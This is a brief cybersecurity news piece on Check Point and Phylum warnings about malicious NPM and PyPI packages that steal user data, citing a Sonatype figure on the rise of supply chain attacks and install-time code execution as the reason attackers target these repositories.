Check Point and Phylum issue a warning regarding recently discovered NPM and PyPI packages designed to steal user information and download additional payloads.
Malicious actors are increasingly relying on software supply chain attacks to infect both developers and users with malware. This is done by taking advantage of the widespread use of open source code in application development. A Sonatype report from October 2022 states that there were 633% more software supply chain attacks in 2022 than there were in 2021.
The reason malicious packages prefer to target Node.js (NPM) and Python (PyPI) repositories is that code execution can occur during package installation, according to Check Point. The cybersecurity company claims to have discovered two malicious Python packages that fit this description in a recent report.